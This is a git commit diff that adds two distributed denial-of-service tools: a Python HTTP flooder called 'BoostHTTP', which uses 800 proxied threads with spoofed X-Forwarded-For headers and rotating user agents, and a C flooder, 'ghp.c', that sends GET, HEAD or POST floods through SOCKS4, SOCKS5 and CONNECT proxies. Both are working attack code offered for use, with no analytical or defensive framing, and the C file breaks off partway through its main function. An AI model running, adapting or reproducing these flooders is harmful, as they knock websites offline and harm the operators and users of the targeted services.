import
This commit is contained in:
commit
ff5300b4c0
|
@ -0,0 +1,176 @@
|
|||
#!/usr/bin/env python
|
||||
#coding: utf8
|
||||
##python BoostHTTP.py [WEBSITE] [LIST.TXT]
|
||||
|
||||
import sys
|
||||
import random
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
|
||||
userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
|
||||
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
|
||||
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
|
||||
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
|
||||
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
|
||||
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
|
||||
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
|
||||
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
|
||||
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
|
||||
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
|
||||
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
|
||||
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
|
||||
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
|
||||
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
|
||||
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
|
||||
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",]
|
||||
|
||||
def randomIp():
|
||||
random.seed()
|
||||
result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
|
||||
result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
|
||||
return result
|
||||
|
||||
def randomIpList():
|
||||
random.seed()
|
||||
res = ""
|
||||
for ip in xrange(random.randint(2, 8)):
|
||||
res = res + randomIp() + ", "
|
||||
return res[0:len(res) - 2]
|
||||
|
||||
def randomUserAgent():
|
||||
return random.choice(userAgents)
|
||||
|
||||
|
||||
|
||||
class attacco(threading.Thread):
|
||||
def run(self):
|
||||
# il thread si prende l'ID
|
||||
current = x
|
||||
|
||||
# se l'ID è associabile ad un proxy, usa il proxy corrispondente
|
||||
if current < len(listaproxy):
|
||||
proxy = listaproxy[current].split(':')
|
||||
else:
|
||||
# altrimenti ne sceglie uno casuale
|
||||
proxy = random.choice(listaproxy).split(':')
|
||||
|
||||
# composizione dell'header http
|
||||
useragent = "User-Agent: " + randomUserAgent() + "\r\n"
|
||||
forward = "X-Forwarded-For: " + randomIpList() + "\r\n"
|
||||
|
||||
httprequest = get_host + useragent + accept + forward + connection + "\r\n"
|
||||
|
||||
# questo ciclo fa aspettare che tutti i threads siano startati prima di cominciare
|
||||
while nload:
|
||||
time.sleep(1)
|
||||
|
||||
# ciclo infinito dell'attacco
|
||||
while 1:
|
||||
# try perché non vogliamo che un errore ci fermi il thread
|
||||
try:
|
||||
# dichiarazione del socket
|
||||
a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
# connessione al proxy
|
||||
a.connect((proxy[0], int(proxy[1])))
|
||||
|
||||
# invio della richiesta http
|
||||
a.send(httprequest)
|
||||
|
||||
# dopo aver inviato la prima richiesta http con successo
|
||||
# c'è la possibilità che se ne possano inviare altre
|
||||
# sulla stessa connessione grazie alla
|
||||
# connessione keep-alive. visto che non c'è la certezza
|
||||
# è meglio metterlo in un try tutto suo
|
||||
try:
|
||||
# invia la richiesta al massimo per altre 3 volte
|
||||
# si è visto che è una scelta abbastanza ottimizzata
|
||||
for i in xrange(3):
|
||||
a.send(httprequest)
|
||||
except:
|
||||
# variabile al momento inutile, tanto per fargli fare
|
||||
# qualcosa dentro l'except, probabilmente in futuro servirà
|
||||
tts = 1
|
||||
|
||||
|
||||
except:
|
||||
# nel caso in cui durante la prima richiesta http avvenga un errore
|
||||
# c'è la possibilità che il proxy non funzioni correttamente
|
||||
# quindi si provvede a cambiare proxy
|
||||
proxy = random.choice(listaproxy).split(':')
|
||||
|
||||
|
||||
|
||||
# grafica varia
|
||||
print(" .----.BoosTHTTPv3.0 iPerFul DDoS for HTTP WebSite.----.")
|
||||
print(" .----.Creator: TheRunixx & Huggye.----.")
|
||||
|
||||
# input del sito
|
||||
url = sys.argv[1]
|
||||
host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
|
||||
|
||||
# qui viene caricata la lista proxy dal file proxy.txt
|
||||
in_file = open(sys.argv[2],"r")
|
||||
proxyf = in_file.read()
|
||||
in_file.close()
|
||||
|
||||
# grazie al caro split() ora la lista è una lista :D
|
||||
listaproxy = proxyf.split('\n')
|
||||
|
||||
# input del numero di threads
|
||||
thread = 800
|
||||
|
||||
|
||||
# dichiarazione di alcuni pezzi dell'header
|
||||
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
|
||||
accept = "Accept-Encoding: gzip, deflate\r\n"
|
||||
|
||||
# con "Connection: Keep-Alive, ecc..." è possibile, anche se non dovrebbe esserlo, inviare
|
||||
# ai proxy più richieste http usando la stessa connessione
|
||||
connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n"
|
||||
|
||||
|
||||
# nload (not loaded) è 1 quando i threads non sono ancora stati tutti avviati
|
||||
# e diventa 0 quando il ciclo di avvio dei threads è finito
|
||||
nload = 1
|
||||
|
||||
# x serve a dare "l'id" del thread
|
||||
x = 0
|
||||
|
||||
# ciclo di avvio dei threads
|
||||
for x in xrange(thread):
|
||||
attacco().start()
|
||||
time.sleep(0.000)
|
||||
print "Thread " + str(x) + " started!"
|
||||
|
||||
print "The attack is running..."
|
||||
# nload diventa 0 e i thread iniziano a lavorare
|
||||
nload = 0
|
||||
|
||||
#ciclo nabbo in fondo
|
||||
while not nload:
|
||||
time.sleep(1)
|
||||
|
||||
|
|
@ -0,0 +1,800 @@
|
|||
/*
|
||||
gcc -pthread ghp.c -o ghp
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/resource.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <signal.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <ctype.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define RND_CHAR (char)((rand() % 26)+97)
|
||||
|
||||
char *useragents[] = {
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
|
||||
"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
|
||||
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
|
||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
};
|
||||
#define ATTACKPORT 80
|
||||
char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: keep-alive\r\n#cookies#%s\r\n%s";
|
||||
char *postpayload;
|
||||
struct urlparts {
|
||||
char * name;
|
||||
char separator[4];
|
||||
char value[128];
|
||||
} parts[] = {
|
||||
{ "scheme", ":" },
|
||||
{ "userid", "@" },
|
||||
{ "password", ":" },
|
||||
{ "host", "//" },
|
||||
{ "port", ":" },
|
||||
{ "path", "/" },
|
||||
{ "param", ";" },
|
||||
{ "fragment", "#" }
|
||||
};
|
||||
enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
|
||||
#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
|
||||
struct urlparts *returnparts[8];
|
||||
struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
|
||||
struct proxy { char *type; char *ip; int port; int working; };
|
||||
struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
|
||||
struct list *head = NULL;
|
||||
char parseError[128];
|
||||
int parseURL(char *url, struct urlparts **returnpart);
|
||||
char * strsplit(char * s, char * tok);
|
||||
char firstpunc(char *s);
|
||||
int strleft(char * s, int n);
|
||||
void setupparts();
|
||||
void freeparts();
|
||||
char *stristr(const char *String, const char *Pattern);
|
||||
char *str_replace(char *orig, char *rep, char *with);
|
||||
int evalmath(char *input);
|
||||
char *ipstr;
|
||||
char *urll;
|
||||
static int rps = 0;
|
||||
pthread_mutex_t parts_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
|
||||
void removeSubstring(char *s,const char *toremove)
|
||||
{
|
||||
while( s=strstr(s,toremove) )
|
||||
{
|
||||
memmove(s,s+strlen(toremove),1+strlen(s+strlen(toremove)));
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
void *flood(void *par) {
|
||||
struct list *startpoint = (struct list *)par;
|
||||
int i;
|
||||
struct sockaddr_in serverAddr;
|
||||
signal(SIGPIPE, SIG_IGN);
|
||||
char *cookies = malloc(10240);
|
||||
memset(cookies, 0, 10240);
|
||||
|
||||
while(1)
|
||||
{
|
||||
int sent = 0;
|
||||
if(startpoint->data->working == 0)
|
||||
{
|
||||
startpoint = startpoint->next;
|
||||
continue;
|
||||
}
|
||||
|
||||
memset(&serverAddr, 0, sizeof(serverAddr));
|
||||
serverAddr.sin_family = AF_INET;
|
||||
serverAddr.sin_port = htons(startpoint->data->port);
|
||||
serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
|
||||
int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
u_int yes=1;
|
||||
if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
|
||||
if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
continue;
|
||||
}
|
||||
|
||||
if(strcmp(startpoint->data->type, "Socks4")==0)
|
||||
{
|
||||
unsigned char buf[10];
|
||||
buf[0] = 0x04;
|
||||
buf[1] = 0x01;
|
||||
*(unsigned short*)&buf[2] = htons(ATTACKPORT);
|
||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
||||
buf[8] = 0x00;
|
||||
if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
if(strcmp(startpoint->data->type, "Socks5")==0)
|
||||
{
|
||||
unsigned char buf[20];
|
||||
buf[0] = 0x05;
|
||||
buf[1] = 0x01;
|
||||
buf[2] = 0x00;
|
||||
if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
buf[0] = 0x05;
|
||||
buf[1] = 0x01;
|
||||
buf[2] = 0x00;
|
||||
buf[3] = 0x01;
|
||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
||||
*(unsigned short*)&buf[8] = htons(ATTACKPORT);
|
||||
if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
|
||||
{
|
||||
char *connectrequest = malloc(1024);
|
||||
bzero(connectrequest, 1024);
|
||||
sprintf(connectrequest, "CONNECT %s:80 HTTP/1.0\r\n\r\n", ipstr);
|
||||
if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
char *recvbuf = malloc(1024);
|
||||
bzero(recvbuf, 1024);
|
||||
int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
|
||||
if(gotbytes < 1)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
free(recvbuf);
|
||||
}
|
||||
|
||||
char *httpprepayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
|
||||
if(httpprepayload == NULL)
|
||||
{
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
|
||||
char *httppayload = NULL;
|
||||
if(strlen(cookies)>0)
|
||||
{
|
||||
httppayload = str_replace(httpprepayload, "#cookies#", cookies);
|
||||
if(httppayload == NULL)
|
||||
{
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
free(httpprepayload);
|
||||
}
|
||||
else
|
||||
{
|
||||
removeSubstring(httpprepayload, "#cookies#");
|
||||
httppayload = httpprepayload;
|
||||
}
|
||||
send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
|
||||
free(httppayload);
|
||||
close(serverSocket);
|
||||
rps++;
|
||||
startpoint = startpoint->next;
|
||||
}
|
||||
}
|
||||
pthread_t **threads = NULL;
|
||||
int main(int argc, char *argv[ ]) {
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
char *method = argv[2];
|
||||
if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
|
||||
{
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
FILE *pFile = fopen(argv[4], "rb");
|
||||
if(pFile==NULL)
|
||||
{
|
||||
perror("fopen"); exit(1);
|
||||
}
|
||||
fseek(pFile, 0, SEEK_END);
|
||||
long lSize = ftell(pFile);
|
||||
rewind(pFile);
|
||||
char *buffer = (char *)malloc(lSize*sizeof(char));
|
||||
fread(buffer, 1, lSize, pFile);
|
||||
fclose (pFile);
|
||||
int i=0;
|
||||
char *pch = (char *)strtok(buffer, ":");
|
||||
while(pch != NULL)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(head, sizeof(struct list));
|
||||
head->data = (struct proxy *)malloc(sizeof(struct proxy));
|
||||
bzero(head->data, sizeof(struct proxy));
|
||||
head->data->working = 1;
|
||||
head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
if(pch == NULL) exit(-1);
|
||||
head->data->port = atoi(pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(new_node, sizeof(struct list));
|
||||
new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
|
||||
bzero(new_node->data, sizeof(struct proxy));
|
||||
new_node->data->working = 1;
|
||||
new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
if(pch == NULL) break;
|
||||
new_node->data->port = atoi(pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
free(buffer);
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit");
|
||||
fprintf(stderr, "setrlimit returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
setupparts();
|
||||
parseURL(argv[1], returnparts);
|
||||
if(argc > 6 && !(strcmp(argv[6], "0") == 0))
|
||||
{
|
||||
ipstr = malloc(strlen(argv[6])+1);
|
||||
bzero(ipstr, strlen(argv[6])+1);
|
||||
strcpy(ipstr, argv[6]);
|
||||
fprintf(stdout, "Using manual IP...\n");
|
||||
} else {
|
||||
struct hostent *he;
|
||||
struct in_addr a;
|
||||
he = gethostbyname(returnparts[host]->value);
|
||||
if (he)
|
||||
{
|
||||
while (*he->h_addr_list)
|
||||
{
|
||||
bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
|
||||
ipstr = malloc(INET_ADDRSTRLEN+1);
|
||||
inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
|
||||
break;
|
||||
}
|
||||
}
|
||||
else
|
||||
{ herror("gethostbyname"); }
|
||||
}
|
||||
char *postdata = malloc(1);
|
||||
bzero(postdata, 1);
|
||||
char *extrahead = malloc(1);
|
||||
bzero(extrahead, 1);
|
||||
if(argc > 7)
|
||||
{
|
||||
fprintf(stdout, "Using post parameters\n");
|
||||
free(postdata);
|
||||
free(extrahead);
|
||||
postdata = argv[7];
|
||||
extrahead = malloc(4096);
|
||||
bzero(extrahead, 4096);
|
||||
sprintf(extrahead, "Content-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\n", strlen(postdata));
|
||||
}
|
||||
threads = malloc((num_threads + 1) * sizeof(pthread_t *));
|
||||
bzero(threads, (num_threads + 1) * sizeof(pthread_t *));
|
||||
postpayload = malloc(4096);
|
||||
urll = argv[1];
|
||||
sprintf(postpayload, postformat, method, returnparts[path]->value, returnparts[host]->value, extrahead, postdata);
|
||||
freeparts();
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<num_threads;i++){
|
||||
*(threads + i) = malloc(sizeof(pthread_t));
|
||||
bzero(*(threads + i), sizeof(pthread_t));
|
||||
pthread_create(*(threads + i), NULL, &flood, (void *)head);
|
||||
head = head->next;
|
||||
}
|
||||
int temp = atoi(argv[5]);
|
||||
